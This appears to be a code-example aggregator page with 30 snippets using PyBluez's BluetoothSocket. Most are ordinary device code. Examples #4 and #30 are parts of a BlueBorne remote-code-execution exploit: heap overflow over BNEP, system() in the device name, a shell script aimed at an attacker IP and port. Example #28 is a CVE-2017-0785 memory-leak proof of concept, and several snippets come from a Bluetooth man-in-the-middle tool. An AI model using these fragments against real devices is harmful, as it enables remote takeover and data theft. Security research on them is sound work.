Python bluetooth.BluetoothSocket() Examples
The following are 30
code examples of bluetooth.BluetoothSocket().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
bluetooth
, or try the search function
.
.
Example #1
| Source File: bluetoothScanner.py From sensorReporter with Apache License 2.0 | 7 votes |
|
def getRSSI(self):
"""Detects whether the device is near by or not using RSSI"""
addr = self.address
# Open hci socket
hci_sock = bt.hci_open_dev()
hci_fd = hci_sock.fileno()
# Connect to device (to whatever you like)
bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bt_sock.settimeout(10)
result = bt_sock.connect_ex((addr, 1)) # PSM 1 - Service Discovery
try:
# Get ConnInfo
reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17)
request = array.array("c", reqstr )
handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1)
handle = struct.unpack("8xH14x", request.tostring())[0]
# Get RSSI
cmd_pkt=struct.pack('H', handle)
rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM,
bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt)
rssi = struct.unpack('b', rssi[3])[0]
# Close sockets
bt_sock.close()
hci_sock.close()
return rssi
except Exception, e:
#self.logger.error("<Bluetooth> (getRSSI) %s" % (repr(e)))
return None
Example #2
| Source File: bluetooth_battery.py From Bluetooth_Headset_Battery_Level with GNU General Public License v3.0 | 6 votes |
|
def main():
if (len(sys.argv) < 2):
print("Usage: bl_battery.py <BT_MAC_ADDRESS_1>[.PORT] ...")
print(" Port number is optional (default = 4)")
exit()
else:
for device in sys.argv[1:]:
i = device.find('.')
if i == -1:
port = 4
else:
port = int(device[i+1:])
device = device[:i]
try:
s = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
s.connect((device, port))
while getATCommand(s, s.recv(128), device):
pass
s.close()
except OSError as e:
print(f"{device} is offline", e)
Example #3
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 6 votes |
|
def start_service(self, service, adapter_addr=''):
print_verbose('Starting service ',service)
server_sock=None
if service['port'] in self.servers:
print('Port',service['port'],'is already binded to')
return server_sock
if service['protocol'].lower() == 'l2cap':
server_sock=BluetoothSocket( L2CAP )
else:
server_sock=BluetoothSocket( RFCOMM )
addrport = (adapter_address(self.master_adapter),service['port'])
print_verbose('Binding to ',addrport)
server_sock.bind(addrport)
self.servers.append(service['port'])
server_sock.listen(1)
port = server_sock.getsockname()[1]
return server_sock
Example #4
| Source File: doit.py From blueborne with GNU General Public License v3.0 | 6 votes |
|
def set_bt_name(payload, src_hci, src, dst):
# Create raw HCI sock to set our BT name
raw_sock = bt.hci_open_dev(bt.hci_devid(src_hci))
flt = bt.hci_filter_new()
bt.hci_filter_all_ptypes(flt)
bt.hci_filter_all_events(flt)
raw_sock.setsockopt(bt.SOL_HCI, bt.HCI_FILTER, flt)
# Send raw HCI command to our controller to change the BT name (first 3 bytes are padding for alignment)
raw_sock.sendall(binascii.unhexlify('01130cf8cccccc') + payload.ljust(MAX_BT_NAME, b'\x00'))
raw_sock.close()
#time.sleep(1)
time.sleep(0.1)
# Connect to BNEP to "refresh" the name (does auth)
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.bind((src, 0))
bnep.connect((dst, BNEP_PSM))
bnep.close()
# Close ACL connection
os.system('hcitool dc %s' % (dst,))
#time.sleep(1)
Example #5
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def send(self,data,):
if self.sticky_state == self.not_connected:
if self.address is None:
raise RuntimeError('No address is set in sticky socket')
self.connect(self.address)
elif self.sticky_state == self.disconnected:
self.rebuild()
self.connect(self.address)
if self._cb and not self.prevent_recursion:
self.prevent_recursion = True
data = self._cb(self,data)
self.prevent_recursion = False
return bluetooth.BluetoothSocket.send(self,data)
Example #6
| Source File: bluezchat.py From python-for-android with Apache License 2.0 | 5 votes |
|
def start_server(self):
self.server_sock = bluetooth.BluetoothSocket (bluetooth.L2CAP)
self.server_sock.bind(("",0x1001))
self.server_sock.listen(1)
gobject.io_add_watch(self.server_sock,
gobject.IO_IN, self.incoming_connection)
Example #7
| Source File: btk.py From btk with MIT License | 5 votes |
|
def loop():
bus = SystemBus()
bus.own_name('net.lvht.btk')
obj_path = '/net/lvht/btk/HIDProfile'
sock = bt.BluetoothSocket(bt.L2CAP)
sock.setblocking(False)
try:
sock.bind(('', PSM_INTR))
except:
print("For bluez5 add --noplugin=input to the bluetoothd commandline")
print("Else there is another application running that has it open.")
sys.exit(errno.EACCES)
sock.listen(1)
profile = HIDProfile(bus.con, obj_path, sock)
opts = {
"PSM": GLib.Variant.new_uint16(PSM_CTRL),
"ServiceRecord": GLib.Variant.new_string(open('sdp_record.xml', 'r').read()),
"RequireAuthentication": GLib.Variant.new_boolean(True),
"RequireAuthorization": GLib.Variant.new_boolean(False),
}
manager = bus.get('org.bluez')['.ProfileManager1']
manager.RegisterProfile(obj_path, str(uuid.uuid4()), opts)
profile.run()
Example #8
| Source File: divoom_device.py From divoom-adapter with GNU General Public License v3.0 | 5 votes |
|
def __init__(self, addr): self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) self.addr = addr
Example #9
| Source File: bt_rssi.py From bluetooth-proximity with Apache License 2.0 | 5 votes |
|
def __init__(self, addr):
self.addr = addr
self.hci_sock = bt.hci_open_dev()
self.hci_fd = self.hci_sock.fileno()
self.bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
self.bt_sock.settimeout(10)
self.connected = False
self.cmd_pkt = None
Example #10
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def __init__(self,address=None,proto=None, **kwargs):
self.not_connected = 0
self.connected = 1
self.disconnected = 2
self.sticky_state = self.not_connected
self.address = address
self.prevent_recursion = False
self.target = kwargs.get('target',None)
self.server = kwargs.get('server',False)
self._cb = kwargs.get('callback',None)
if 'sock' in kwargs:
proto = kwargs['sock']._proto
bluetooth.BluetoothSocket.__init__(self,proto,kwargs.get('sock',None))
Example #11
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def close(self,):
bluetooth.BluetoothSocket.close(self,)
self.sticky_state = self.not_connected
Example #12
| Source File: bt.py From pyescpos with Apache License 2.0 | 5 votes |
|
def catch(self):
_check_lib_bluetooth()
self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.socket.connect((self.address, self.port))
Example #13
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def accept(self,):
newsock,addr= bluetooth.BluetoothSocket.accept(self,)
newsock = StickyBluetoothSocket(addr, self._proto, sock=newsock)
newsock.sticky_state = self.connected
return newsock,addr
Example #14
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def rebuild(self,):
bluetooth.BluetoothSocket.__init__(self,self._proto)
self.sticky_state = self.not_connected
#self.connect(self.address)
Example #15
| Source File: mitm.py From btproxy with GNU General Public License v3.0 | 5 votes |
|
def connect_to_svc(self,device, **kwargs):
print_verbose('connecting to', device)
socktype = bluetooth.RFCOMM
if device['protocol'] == None or device['protocol'].lower() == 'rfcomm':
socktype = bluetooth.RFCOMM
elif device['protocol'].lower() == 'l2cap':
socktype = bluetooth.L2CAP
else:
print('Unsupported protocol '+device['protocol'])
while True:
try:
sock=bluetooth.BluetoothSocket( socktype )
if kwargs.get('addr',None) == 'slave' and 0:
for i in range(0,3):
try:
addrport=(adapter_address(self.slave_adapter),self.starting_psm)
print_verbose('binding to ', addrport)
sock.bind(addrport)
self.starting_psm += 2
break
except BluetoothError as e:
if i==2: raise e
sock.connect((device['host'], device['port'] if device['port'] else 1))
print_verbose('Connected')
return sock
except BluetoothError as e:
if not kwargs.get('reconnect',False):
raise RuntimeError(e)
print('Reconnecting...')
Example #16
| Source File: bt.py From calvin-base with Apache License 2.0 | 5 votes |
|
def createInternetSocket(self):
s = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
s.setblocking(0)
tcp.fdesc._setCloseOnExec(s.fileno())
return s
Example #17
| Source File: bt.py From calvin-base with Apache License 2.0 | 5 votes |
|
def createInternetSocket(self):
s = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
s.setblocking(0)
if platformType == "posix" and sys.platform != "cygwin":
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s
Example #18
| Source File: thinkgear.py From cloudbrain with GNU Affero General Public License v3.0 | 5 votes |
|
def initializeBluetoothDevice(self):
socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
try:
socket.connect(
(self.device_address, THINKGEAR_DEVICE_BLUETOOTH_CHANNEL))
except Exception, e:
if self.DEBUG:
print("ERROR: %s" % e)
sys.exit()
Example #19
| Source File: bluezchat.py From python-for-android with Apache License 2.0 | 5 votes |
|
def connect(self, addr):
sock = bluetooth.BluetoothSocket (bluetooth.L2CAP)
try:
sock.connect((addr, 0x1001))
except bluez.error, e:
self.add_text("\n%s" % str(e))
sock.close()
return
Example #20
| Source File: bluetooth.py From peach with Mozilla Public License 2.0 | 5 votes |
|
def start(self):
if self._socket:
return
if usingLightBlue:
for each_try in range(1, 5):
print("[*] Connecting to %s on PSM %d (%d)" % (self.ba_addr, self.port, each_try))
try:
self._socket = lightblue.socket(lightblue.L2CAP)
self._socket.connect((self.ba_addr, self.port))
except socket.error:
self._socket = None
print("Failed.")
print("Wait {} seconds ...".format(self.giveup))
time.sleep(self.giveup)
else:
print("Done.")
break
if usingBluetooth:
for each_try in range(1, 5):
print("[*] Connecting to %s on PSM %d (%d)" % (self.ba_addr, self.port, each_try))
try:
self._socket = bluetooth.BluetoothSocket(bluetooth.L2CAP)
self._socket.connect((self.ba_addr, self.port))
except socket.error:
self._socket = None
print("Failed.")
print("Wait {} seconds ...".format(self.giveup))
time.sleep(self.giveup)
else:
print("Done.")
break
print("")
if not self._socket:
raise PeachException("L2CAP connection attempt failed.")
Example #21
| Source File: bluetooth.py From peach with Mozilla Public License 2.0 | 5 votes |
|
def pybluez_server_test():
s = bluetooth.BluetoothSocket(bluetooth.L2CAP)
s.bind(("", 0x1001))
s.listen(1)
conn, addr = s.accept()
print("Connected by %s" % addr)
data = s.recv(1024)
print("Received: %s" % data)
conn.close()
s.close()
Example #22
| Source File: message_process.py From miaomiaoji-tool with MIT License | 5 votes |
|
def connect(self):
if self.address is None and not self.scandevices():
return False
if not self.scanservices():
return False
logging.info("Service found. Connecting to \"%s\" on %s..." % (self.service["name"], self.service["host"]))
self.sock = BluetoothSocket(RFCOMM)
self.sock.connect((self.service["host"], self.service["port"]))
self.sock.settimeout(60)
logging.info("Connected.")
self.registerCrcKeyToBt()
return True
Example #23
| Source File: tcp_bridge.py From ReachView with GNU General Public License v3.0 | 5 votes |
|
def initialize(self):
self.server_socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.server_socket.bind(("",bluetooth.PORT_ANY))
self.server_socket.listen(1)
port = self.server_socket.getsockname()[1]
uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee"
bluetooth.advertise_service(
self.server_socket,
"ReachBluetoothSocket",
service_id = uuid,
service_classes = [uuid, bluetooth.SERIAL_PORT_CLASS],
profiles = [bluetooth.SERIAL_PORT_PROFILE],
)
Example #24
| Source File: __init__.py From platypush with MIT License | 5 votes |
|
def connect(self, protocol=None, device: str = None, port: int = None, service_uuid: str = None,
service_name: str = None):
"""
Connect to a bluetooth device.
You can query the advertised services through ``find_service``.
:param protocol: Supported values: either 'RFCOMM'/'L2CAP' (str) or bluetooth.RFCOMM/bluetooth.L2CAP
int constants (int)
:param device: Device address or name
:param port: Port number
:param service_uuid: Service UUID
:param service_name: Service name
"""
from bluetooth import BluetoothSocket
addr, port, protocol = self._get_addr_port_protocol(protocol=protocol, device=device, port=port,
service_uuid=service_uuid, service_name=service_name)
sock = self._get_sock(protocol=protocol, device=addr, port=port)
if sock:
self.close(device=addr, port=port)
sock = BluetoothSocket(protocol)
self.logger.info('Opening connection to device {} on port {}'.format(addr, port))
sock.connect((addr, port))
self.logger.info('Connected to device {} on port {}'.format(addr, port))
self._socks[(addr, port)] = sock
Example #25
| Source File: MindwaveMobileRawReader.py From NeuroPi with GNU General Public License v3.0 | 5 votes |
|
def connectToMindWaveMobile(self, mac):
# connecting via bluetooth RFCOMM
self.mindwaveMobileSocket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
mindwaveMobileAddress = mac;
while(True):
try:
self.mindwaveMobileSocket.connect((mindwaveMobileAddress, 1))
return;
except bluetooth.btcommon.BluetoothError as error:
print "Could not connect: ", error, "; Retrying in 5s..."
time.sleep(5)
Example #26
| Source File: test_bluetooth.py From self_driving_pi_car with MIT License | 5 votes |
|
def test_bluetooth_1_connection(self):
socket = blue.BluetoothSocket(blue.RFCOMM)
socket.connect((self.ID, 1))
peer_name = socket.getpeername()
self.assertEqual(self.ID, peer_name[0])
Example #27
| Source File: bluesock.py From nxt-python with GNU General Public License v3.0 | 5 votes |
|
def connect(self):
if self.debug:
print('Connecting via Bluetooth...')
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((self.host, BlueSock.PORT))
self.sock = sock
if self.debug:
print('Connected.')
return Brick(self)
Example #28
| Source File: CVE-2017-0785.py From bluescan with GNU General Public License v3.0 | 4 votes |
|
def main():
target_bd_addr = args['BD_ADDR']
l2cap_mtu = 50
sock = BluetoothSocket(L2CAP)
set_l2cap_mtu(sock, l2cap_mtu)
sock.connect((target_bd_addr, PSM_SDP))
print('Sending the first SDP_SERVICE_SEARCH_REQ PDU')
params = {
'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
'MaximumServiceRecordCount': 0xFFFF,
'ContinuationState': b'\x00'
}
sock.send(sdp_service_search_req(params))
sdp_service_search_rsp = sock.recv(l2cap_mtu)
info_len = sdp_service_search_rsp[-3]
if info_len != ANDROID_CONT_STATE_INFO_LEN:
print(sdp_service_search_rsp[-3])
print('Invalid continuation state received.')
sys.exit(1)
stack = b''
for i in range(1, 30): # 越界读的次数太多会导致目标蓝牙崩溃
print('Sending packet %d' % i)
params = {
'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
'MaximumServiceRecordCount': 0x0001,
'ContinuationState': sdp_service_search_rsp[-3:]
}
sock.send(sdp_service_search_req(params))
sdp_service_search_rsp = sock.recv(l2cap_mtu)
# Leaked info is in ServiceRecordHandleList field
stack += sdp_service_search_rsp[9:-3]
sock.close()
print(hexdump(stack))
if len(stack) > 20:
print('CVE-2017-0785')
Example #29
| Source File: scratch_link.py From bluepy-scratch-link with BSD 3-Clause "New" or "Revised" License | 4 votes |
|
def handle_request(self, method, params):
"""Handle requests from Scratch"""
logger.debug("handle request to BT device")
logger.debug(method)
if len(params) > 0:
logger.debug(params)
res = { "jsonrpc": "2.0" }
if self.status == self.INITIAL and method == 'discover':
logger.debug("Starting async discovery")
self.status = self.DISCOVERY
self.bt_thread = self.BTThread(self, params["majorDeviceClass"], params["minorDeviceClass"])
self.bt_thread.start()
res["result"] = None
elif self.status in [self.DISCOVERY, self.DISCOVERY_COMPLETE] and method == 'connect':
# Cancel discovery
while self.status == self.DISCOVERY:
logger.debug("Cancelling discovery")
self.bt_thread.cancel_discovery = True
time.sleep(1)
addr = params['peripheralId']
logger.debug(f"connecting to the BT device {addr}")
try:
self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.sock.connect((addr, 1))
logger.info(f"connected to BT device: {addr}")
except bluetooth.BluetoothError as e:
logger.error(f"failed to connect to BT device: {e}", exc_info=e)
self.status = self.DONE
self.sock = None
if self.sock:
res["result"] = None
self.status = self.CONNECTED
else:
err_msg = f"BT connect failed: {addr}"
res["error"] = { "message": err_msg }
self.status = self.DONE
elif self.status == self.CONNECTED and method == 'send':
logger.debug("handle send request")
if params['encoding'] != 'base64':
logger.error("encoding other than base 64 is not "
"yet supported: ", params['encoding'])
msg_bstr = params['message'].encode('ascii')
data = base64.standard_b64decode(msg_bstr)
self.sock.send(data)
res['result'] = len(data)
logger.debug(res)
return res
Example #30
| Source File: doit.py From blueborne with GNU General Public License v3.0 | 4 votes |
|
def pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base):
# Gen new BDADDR, so that the new BT name will be cached
src = set_rand_bdaddr(src_hci)
# Payload is: '"\x17AAAAAAsysm";\n<bash_commands>\n#'
# 'sysm' is the address of system() from libc. The *whole* payload is a shell script.
# 0x1700 == (0x1722 & 0xff00) is the "event" of a "HORRIBLE_HACK" message.
payload = struct.pack('<III', 0xAAAA1722, 0x41414141, system_addr) + b'";\n' + \
SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) + b'\n#'
assert len(payload) < MAX_BT_NAME
assert b'\x00' not in payload
# Puts payload into a known bss location (once we create a BNEP connection).
set_bt_name(payload, src_hci, src, dst)
prog = log.progress('Connecting to BNEP again')
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.bind((src, 0))
bnep.connect((dst, BNEP_PSM))
prog.success()
prog = log.progress('Pwning...')
# Each of these messages causes BNEP code to send 100 "command not understood" responses.
# This causes list_node_t allocations on the heap (one per reponse) as items in the xmit_hold_q.
# These items are popped asynchronously to the arrival of our incoming messages (into hci_msg_q).
# Thus "holes" are created on the heap, allowing us to overflow a yet unhandled list_node of hci_msg_q.
for i in range(20):
bnep.send(binascii.unhexlify('8109' + '800109' * 100))
# Repeatedly trigger the vuln (overflow of 8 bytes) after an 8 byte size heap buffer.
# This is highly likely to fully overflow over instances of "list_node_t" which is exactly
# 8 bytes long (and is *constantly* used/allocated/freed on the heap).
# Eventually one overflow causes a call to happen to "btu_hci_msg_process" with "p_msg"
# under our control. ("btu_hci_msg_process" is called *constantly* with messages out of a list)
for i in range(1000):
# If we're blocking here, the daemon has crashed
_, writeable, _ = select.select([], [bnep], [], PWNING_TIMEOUT)
if not writeable:
break
bnep.send(binascii.unhexlify('810100') +
struct.pack('<II', 0, acl_name_addr))
else:
log.info("Looks like it didn't crash. Possibly worked")
prog.success()
